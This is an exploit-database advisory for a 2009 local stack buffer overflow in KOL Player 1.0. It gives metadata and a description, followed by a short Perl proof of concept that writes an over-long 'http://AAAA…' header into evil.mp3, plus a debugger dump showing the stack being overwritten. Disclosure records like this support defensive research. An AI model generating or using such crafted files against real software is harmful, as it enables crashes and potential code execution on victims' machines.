KOL Player 1.0 (.mp3) Local Buffer Overflow PoC

vendor:

KOL Player 1.0

by:

milw0rm.com

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: KOL Player 1.0

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

KOL Player 1.0 (.mp3) Local Buffer Overflow PoC

KOL Player 1.0 is vulnerable to a local buffer overflow vulnerability when a specially crafted .mp3 file is opened. The vulnerability is caused due to a boundary error when handling the HTTP header of the .mp3 file. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted .mp3 file with an overly long HTTP header.

Mitigation:

Upgrade to the latest version of KOL Player 1.0

Source

Exploit-DB raw data:

#!/usr/bin/perl
# KOL Player 1.0 (.mp3) Local Buffer Overflow PoC
# http://thaddy.co.uk/kolacmwaveplayer.zip
########################################################################################
# 0012F920  |00168370  ASCII "AAAA"
# 0012F924  |41410004
# 0012F928  |41414141
# 0012F92C  |41414141
# 0012F930  |41414141
# 0012F934  |41414141
# 0012F938  |41414141
# 0012F93C  |41414141
# 0012F940  |41414141
# 0012F944  |41414141
# 0012F948  |41414141
########################################################################################
my $crash="http://"."\x41" x 3200;
open(myfile,'>>evil.mp3');
print myfile $crash;
######################################################################################## 

# milw0rm.com [2009-08-18]